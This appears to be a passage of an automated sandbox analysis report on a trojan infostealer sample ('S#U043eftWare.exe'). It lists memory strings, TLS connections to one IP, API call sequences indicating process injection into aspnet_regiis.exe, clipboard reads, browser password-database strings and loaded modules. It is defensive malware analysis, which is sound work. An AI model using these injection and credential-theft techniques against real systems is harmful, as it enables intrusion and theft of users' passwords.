            Source: aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752555209.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731925618.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752661147.0000000004C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752555209.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731925618.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752661147.0000000004C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00963550 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00963550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00963550 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00963550

            System Summary

            barindex
            Source: S#U043eftWare.exeStatic PE information: section name: :Mn-oI
            Source: S#U043eftWare.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDC86F0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtGetContextThread,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,CloseHandle,CloseHandle,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,CloseHandle,NtGetContextThread,NtWriteVirtualMemory,0_2_6CDC86F0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDC6BD0 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6CDC6BD0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_0054AC100_2_0054AC10
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_005310E00_2_005310E0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_0051B8900_2_0051B890
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_005438B00_2_005438B0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_0051B5400_2_0051B540
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_0054D9400_2_0054D940
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_0052F1100_2_0052F110
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_00531D300_2_00531D30
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_00532DF00_2_00532DF0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_0051BDE00_2_0051BDE0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_0052EE600_2_0052EE60
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_004F8B670_2_004F8B67
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_00549FE00_2_00549FE0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_004F8B960_2_004F8B96
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_005183B00_2_005183B0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDC14000_2_6CDC1400
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDC86F00_2_6CDC86F0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDC6BD00_2_6CDC6BD0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDC48100_2_6CDC4810
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDC10000_2_6CDC1000
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDC82A00_2_6CDC82A0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD06600_2_6CDD0660
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDDABE10_2_6CDDABE1
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_0054BDC00_2_0054BDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009528A02_2_009528A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009544702_2_00954470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009689D02_2_009689D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0096B1002_2_0096B100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009571402_2_00957140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009509702_2_00950970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0093E2B22_2_0093E2B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0093D2C52_2_0093D2C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00938AE02_2_00938AE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00970FB02_2_00970FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00939BA02_2_00939BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00948BE32_2_00948BE3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009707402_2_00970740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009484902_2_00948490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00936CD02_2_00936CD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00970CD02_2_00970CD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009680002_2_00968000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00935C202_2_00935C20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094CC202_2_0094CC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009534502_2_00953450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0096F4502_2_0096F450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009368402_2_00936840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094AC642_2_0094AC64
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0093546B2_2_0093546B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009385902_2_00938590
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009575802_2_00957580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00954DB02_2_00954DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009581BC2_2_009581BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00967DA02_2_00967DA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009709F02_2_009709F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009541E82_2_009541E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094F5102_2_0094F510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009569102_2_00956910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009591002_2_00959100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009349302_2_00934930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094D53A2_2_0094D53A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009335502_2_00933550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0096F5502_2_0096F550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009569592_2_00956959
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009361702_2_00936170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094B68E2_2_0094B68E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094EEA02_2_0094EEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094CED02_2_0094CED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094FAF02_2_0094FAF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009566302_2_00956630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009396502_2_00939650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0096C2502_2_0096C250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0093DA432_2_0093DA43
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009616702_2_00961670
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00950BB02_2_00950BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009583CA2_2_009583CA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0093AFE02_2_0093AFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00954BE22_2_00954BE2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00949FED2_2_00949FED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009393002_2_00939300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094DF002_2_0094DF00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0096B7002_2_0096B700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0096BB302_2_0096BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00932B202_2_00932B20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009553442_2_00955344
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009577742_2_00957774
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00933F602_2_00933F60
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1228
            Source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs S#U043eftWare.exe
            Source: S#U043eftWare.exe, 00000000.00000000.1676874362.00000000005A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXeniaRubyEleanor.fIMmT vs S#U043eftWare.exe
            Source: S#U043eftWare.exeBinary or memory string: OriginalFilenameXeniaRubyEleanor.fIMmT vs S#U043eftWare.exe
            Source: S#U043eftWare.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: S#U043eftWare.exeStatic PE information: Section: :Mn-oI ZLIB complexity 1.0003229166666667
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@1/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_009689D0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_009689D0
            Source: C:\Users\user\Desktop\S#U043eftWare.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7624
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c51e66c2-91b8-4a1b-acf9-6c8408be2621Jump to behavior
            Source: S#U043eftWare.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\S#U043eftWare.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: aspnet_regiis.exe, 00000002.00000003.1731576347.0000000004C24000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752599016.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: S#U043eftWare.exeReversingLabs: Detection: 26%
            Source: S#U043eftWare.exeString found in binary or memory: -addpset
            Source: S#U043eftWare.exeString found in binary or memory: -addfulltrust
            Source: S#U043eftWare.exeString found in binary or memory: -addgroup
            Source: S#U043eftWare.exeString found in binary or memory: -help
            Source: C:\Users\user\Desktop\S#U043eftWare.exeFile read: C:\Users\user\Desktop\S#U043eftWare.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\S#U043eftWare.exe "C:\Users\user\Desktop\S#U043eftWare.exe"
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1228
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: S#U043eftWare.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: S#U043eftWare.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %%.pdb source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, WER87AC.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER87AC.tmp.dmp.5.dr
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\S#U043eftWare.PDB source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
